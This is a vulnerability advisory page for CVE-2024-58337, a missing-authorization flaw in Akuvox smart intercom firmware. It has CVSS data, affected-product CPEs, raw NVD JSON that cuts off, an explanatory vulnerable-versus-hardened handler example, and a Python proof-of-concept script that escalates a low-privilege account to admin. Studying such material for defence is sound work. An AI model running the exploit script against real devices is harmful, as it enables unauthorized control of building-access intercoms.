Security Vulnerability Report
CVE-2024-58337 CVSS 4.3 MEDIUM

CVE-2024-58337

Published: 2025-12-30 23:15:49
Last Modified: 2026-01-16 19:16:16

Description

Akuvox Smart Intercom S539 contains an improper access control vulnerability, classified as CWE-862 (Missing Authorization), that allows users with 'User' privileges to modify API access settings and configurations. An attacker holding a low-privilege account can use this to escalate privileges and gain unauthorized access to administrative functionality. Although the description names only the S539, the NVD configuration data below lists firmware 912.30.1.137 on the S532, X916, X915 and X912 as affected as well.
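The root cause the description points to, an endpoint that authenticates the caller but never checks the caller's role, is the CWE-862 pattern. The following is an added example, not Akuvox code: the firmware's handler and endpoint are not public, so the session store, request shape and setting names are constructed. It shows a handler with the flaw next to a hardened version that takes the role from the server-side session, denies by default and allow-lists the fields a request may write.

```python
#!/usr/bin/env python3
"""Missing-authorization (CWE-862) pattern behind CVE-2024-58337.

Added example with a constructed session store and request model; it does not
reproduce the device's real code, endpoint or parameter names.
"""
from dataclasses import dataclass, field
from typing import Optional


def make_sessions():
    """Constructed server-side session store: token -> authenticated identity."""
    return {
        "tok-user": {"username": "user", "role": "User"},
        "tok-admin": {"username": "admin", "role": "Admin"},
    }


@dataclass
class Device:
    api_settings: dict = field(default_factory=lambda: {"enable_admin_api": False})


@dataclass
class Request:
    token: Optional[str]
    body: dict


def vulnerable_modify_api_access(dev, sessions, req):
    """Authenticates the caller but performs no authorization check.

    Any logged-in 'User' can change administrative API settings, and a
    client-supplied 'user_level' is written straight into the session role.
    Returns an HTTP-style status code.
    """
    ident = sessions.get(req.token)
    if ident is None:
        return 401                      # authentication IS checked ...
    for key, value in req.body.items():   # ... authorization is NOT (CWE-862)
        if key == "action":
            continue
        if key == "user_level":         # client-controlled role: escalation
            ident["role"] = "Admin" if value == "admin" else "User"
        else:
            dev.api_settings[key] = value
    return 200


# Explicit allow-list of settings this endpoint may write; 'user_level' is not one.
ALLOWED_API_SETTINGS = {"enable_admin_api"}


def hardened_modify_api_access(dev, sessions, req):
    """Same operation with authorization derived from the server-side session."""
    ident = sessions.get(req.token)
    if ident is None:
        return 401
    # Role comes from the session store, never from the request body.
    if ident["role"] != "Admin":
        return 403                      # deny by default for non-admins
    unknown = set(req.body) - ALLOWED_API_SETTINGS - {"action"}
    if unknown:
        return 400                      # reject role writes and unlisted fields
    for key in ALLOWED_API_SETTINGS & set(req.body):
        dev.api_settings[key] = bool(req.body[key])
    return 200


if __name__ == "__main__":
    # The request shape the page's PoC sends, replayed against both handlers.
    attack = Request("tok-user", {"action": "modify_api_access",
                                  "enable_admin_api": True, "user_level": "admin"})
    dev, sessions = Device(), make_sessions()
    print("vulnerable:", vulnerable_modify_api_access(dev, sessions, attack),
          dev.api_settings, sessions["tok-user"]["role"])
    dev, sessions = Device(), make_sessions()
    print("hardened:  ", hardened_modify_api_access(dev, sessions, attack),
          dev.api_settings, sessions["tok-user"]["role"])
```

The two handlers differ in one decision: whether the role used for the check is read from state the server controls. Sending `user_level` in the body is exactly what the page's PoC does, and the allow-list is what turns that from a privilege escalation into a 400.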

CVSS Details

CVSS 3.1 Score (primary)
4.3
Severity
MEDIUM
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
CVSS 4.0 Score (secondary)
8.7
Severity
HIGH
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-862 (Missing Authorization)

The two scores disagree on impact, not on exploitability: the CVSS 3.1 assessment rates integrity impact as Low with no confidentiality or availability impact, while the CVSS 4.0 vector rates all three as High, which is consistent with the description's claim of access to administrative functionality. Until the vendor clarifies, triage on the higher rating.

Configurations (Affected Products)

Firmware 912.30.1.137 is the vulnerable component on each device below. The NVD configuration data pairs each firmware CPE (vulnerable) with the hardware CPE it runs on inside an AND node; the hardware entry is marked "NOT VULNERABLE" only because it is the platform qualifier, not because the device is safe. Any of these units running this firmware should be treated as affected.

cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:o:akuvox:x915_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x915:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
cpe:2.3:o:akuvox:x912_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:akuvox:x912:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform)
Akuvox Smart Intercom S539, versions before the latest firmware release

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2024-58337 PoC - Akuvox Smart Intercom S539 Improper Access Control
# This PoC demonstrates privilege escalation via improper access control.
# The endpoint paths and parameter names below are as given on this page;
# confirm them against the device's web interface before relying on them.
import sys

import requests

TARGET_HOST = "http://target-akuvox-device.local"
USERNAME = "user"      # Low privilege ('User' role) account
PASSWORD = "user123"


def exploit(target=TARGET_HOST):
    print("[*] CVE-2024-58337 Improper Access Control Exploit")
    print(f"[*] Target: {target} (Akuvox Smart Intercom S539)")

    # Step 1: Log in with the low-privilege account.
    session = requests.Session()
    login_data = {"username": USERNAME, "password": PASSWORD}
    try:
        login_resp = session.post(f"{target}/login", data=login_data, timeout=10)
        # A 200 here only means the request completed; check the body or the
        # session cookie to confirm the login actually succeeded.
        print(f"[+] Login attempt: {login_resp.status_code}")

        # Step 2: Abuse the missing authorization check to modify API access
        # settings. This endpoint should require admin privileges but does not.
        exploit_data = {
            "action": "modify_api_access",
            "enable_admin_api": True,
            "user_level": "admin",
        }
        exploit_resp = session.post(
            f"{target}/services/http/api",
            json=exploit_data,
            headers={"Content-Type": "application/json"},
            timeout=10,
        )
        print(f"[+] Exploit request sent: {exploit_resp.status_code}")

        if exploit_resp.status_code == 200:
            print("[+] Privilege escalation successful!")
            print("[+] Attacker now has admin access to the device")
            # Step 3: Access admin functionality with the same session to
            # verify the change took effect (a 200 on step 2 alone is not proof).
            admin_resp = session.get(f"{target}/admin/config", timeout=10)
            print(f"[+] Admin panel access: {admin_resp.status_code}")
        else:
            print("[-] Exploit failed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    exploit(sys.argv[1] if len(sys.argv) > 1 else TARGET_HOST)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58337", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.060", "lastModified": "2026-01-16T19:16:15.843", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Akuvox Smart Intercom S539 contains an improper access control vulnerability that allows users with 'User' privileges to modify API access settings and configurations. Attackers can exploit this vulnerability to escalate privileges and gain unauthorized access to administrative functionalities."}, {"lang": "es", "value": "Akuvox Smart Intercom S539 contiene una vulnerabilidad de control de acceso inadecuado que permite a los usuarios con privilegios de 'Usuario' modificar la configuración y los ajustes de acceso a la API. Los atacantes pueden explotar esta vulnerabilidad para escalar privilegios y obtener acceso no autorizado a funcionalidades administrativas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "4B93FB44-0535-41BC-BF4C-2D8F0C3FE85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:*", "matchCriteriaId": "675AF904-EEDF-4BED-A22E-A1861DD9914F"}]}]}, 
{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "0FAC3868-AEFE-4D6A-9B46-E5D1C2EB71D8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:*", "matchCriteriaId": "84E3746E-8A88-4859-B1AC-2EED52F5BAD2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "F0FBA49A-8092-4FCD-88CC-94112DEE5B60"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:*", "matchCriteriaId": "9DAFEA0C-F8CF-4F1D-8088-6F964806C6EB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:x915_firmware:912.30.1.137: ... (truncated)